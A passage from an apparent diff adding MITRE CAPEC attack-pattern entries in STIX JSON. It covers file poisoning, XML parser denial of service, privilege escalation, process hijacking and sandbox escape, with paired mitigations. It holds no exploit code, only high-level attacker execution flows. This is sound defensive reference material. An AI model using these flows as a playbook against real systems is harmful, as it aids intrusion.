Once the attack is executed, the adversary's program can access relative directories such as C:\\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c" + ], + "x_capec_prerequisites": [ + "The target software must consume files.", + "The adversary must have access to modify files that the target software will consume." + ], + "x_capec_skills_required": { + "Medium": "How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e333960-e5cb-4589-9771-ba6ba993cd18", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Validate all input for content including files. 
Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)", + "id": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-23-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc7b7a16-616e-46d7-b94c-09b98235f8a0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b7de6045-8f58-4418-9b3f-fc61acce3199", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Virus scanning on host", + "id": "course-of-action--1d44c0fd-4e64-4fa4-8d72-c90a53d49497", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-23-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a05f53a8-d3f4-43a9-918b-d1d51c74287e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1d44c0fd-4e64-4fa4-8d72-c90a53d49497", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--960af13f-fe8f-4f17-982b-7e5360329636", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.", + "external_references": [ + { + "external_id": "CAPEC-230", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/230.html" + }, + { + "external_id": "CWE-112", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-674", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007", + "external_id": "REF-89", + "source_name": "reference_from_CAPEC", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html" + } + ], + "id": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Serialized Data with Nested Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service 
(XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An adversary determines the input data stream that is being processed by a data parser that supports using substitution on the victim's side.

Exploit

  1. An adversary crafts input data that may have an adverse effect on the operation of the parser when the data is parsed on the victim's system.

", + "x_capec_extended_description": "\n An adversary's goal is to leverage parser failure to their advantage. In most cases this type of an attack will result in a Denial of Service due to an application becoming unstable, freezing, or crashing. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].\n This attack is most closely associated with web services using SOAP or a Rest API, because remote service requesters can post malicious payloads to the service provider. The main weakness is that the service provider generally must inspect, parse, and validate the messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that this attack targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975" + ], + "x_capec_prerequisites": [ + "An application's user-controllable data is expressed in a language that supports subsitution.", + "An application does not perform sufficient validation to ensure that user-controllable data is not malicious." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully validate and sanitize all user-controllable data prior to passing it to the data parser routine. 
Ensure that the resultant data is safe to pass to the data parser.", + "id": "course-of-action--b31f921a-2494-4fb9-ac18-d36b931a8d7d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e30d321-aee2-4f0d-942b-aab56874c9cd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b31f921a-2494-4fb9-ac18-d36b931a8d7d", + "spec_version": "2.1", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform validation on canonical data.", + "id": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8c47b649-733d-47c3-a553-9ef173fdeb95", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "spec_version": "2.1", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pick a robust implementation of the data parser.", + "id": "course-of-action--9ebad4d6-6c54-4d17-903f-4ad0ab05a641", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--14e9f6cc-aaff-41a7-b258-5c540335632f", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ebad4d6-6c54-4d17-903f-4ad0ab05a641", + "spec_version": "2.1", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.", + "external_references": [ + { + "external_id": "CAPEC-231", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/231.html" + }, + { + "external_id": "CWE-112", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-674", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html" + }, + { + "external_id": "CWE-770", + "source_name": 
"cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007", + "external_id": "REF-89", + "source_name": "reference_from_CAPEC", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html" + } + ], + "id": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Oversized Serialized Data Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An adversary determines the input data stream that is being processed by an serialized data parser on the victim's side.

Experiment

  1. An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim's system.

", + "x_capec_extended_description": "\n Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to their advantage. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861" + ], + "x_capec_prerequisites": [ + "An application uses an parser for serialized data to perform transformation on user-controllable data.", + "An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser." + ], + "x_capec_skills_required": { + "High": "Arbitrary code execution", + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully validate and sanitize all user-controllable serialized data prior to passing it to the parser routine. 
Ensure that the resultant data is safe to pass to the parser.", + "id": "course-of-action--e235322d-0b83-4799-860a-2681f51d6ea5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abe2962c-e934-432f-9b1b-de3b76706fbc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e235322d-0b83-4799-860a-2681f51d6ea5", + "spec_version": "2.1", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7f9b18e-bc2b-4981-ac34-7d93f9d6dde7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "spec_version": "2.1", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pick a robust implementation of the serialized data parser.", + "id": "course-of-action--c7172552-a553-4ec3-ac05-d847c8f293e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2938365a-8b0f-4d54-8471-81ea79d3ef9a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7172552-a553-4ec3-ac05-d847c8f293e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate data against a valid schema or DTD prior to parsing.", + "id": "course-of-action--94c30519-b707-419d-b628-0f08718b908b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7a7e323e-7ab6-42f3-a56d-42335147b140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94c30519-b707-419d-b628-0f08718b908b", + "spec_version": "2.1", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to 
perform.", + "external_references": [ + { + "external_id": "CAPEC-233", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/233.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "external_id": "CWE-1311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1311.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-600", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/03-Testing_for_Privilege_Escalation.html" + } + ], + "id": "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Privilege Escalation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "attack-pattern--9f1d96c7-fcc8-4708-b98d-23f1fd86e07b", + "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9", + "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code.", + "external_references": [ + { + "external_id": "CAPEC-234", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/234.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-648", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html" + } + ], + "id": "attack-pattern--9f1d96c7-fcc8-4708-b98d-23f1fd86e07b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Hijacking a privileged process", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find process with elevated priveleges: The adversary probes for processes running with elevated privileges.

  2. Techniques
    On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
    On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

  1. Find vulnerability in running process: The adversary looks for a vulnerability in the running process that would allow for arbitrary code execution with the privilege of the running process.

  2. Techniques
    Look for improper input validation
    Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.
    Utilize system utilities that support process control that have been inadequately secured

Exploit

  1. Execute arbitrary code: The adversary exploits the vulnerability that they have found and hijacks the running process.

", + "x_capec_prerequisites": [ + "The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.", + "external_references": [ + { + "external_id": "CAPEC-235", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/235.html" + } + ], + "id": "attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not have enough distinction from CAPEC-30 : Hijacking a Privileged Thread of Execution. 
Please refer to CAPEC-30 moving forward.", + "external_references": [ + { + "external_id": "CAPEC-236", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/236.html" + } + ], + "id": "attack-pattern--6616521d-b2f8-49c0-95cd-587eab111f91", + "modified": "2021-10-21T00:00:00.000Z", + "name": "DEPRECATED: Catching exception throw/signal from privileged block", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", + "external_references": [ + { + "external_id": "CAPEC-237", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/237.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy, T. 
Anderson, Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code, The 17th ACM Conference on Computer and Communications Security (CCS '10), 2010", + "external_id": "REF-91", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Malware Protection Center: Threat Research and Response, 2007, Microsoft Corporation", + "external_id": "REF-92", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C" + } + ], + "id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Escaping a Sandbox by Calling Code in Another Language", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. 
The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

  2. Techniques
    The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.
  3. Analysis: The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

  4. Techniques
    The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

Experiment

  1. Verify the exploitable security weaknesses: The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.

  2. Techniques
    The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox.

Exploit

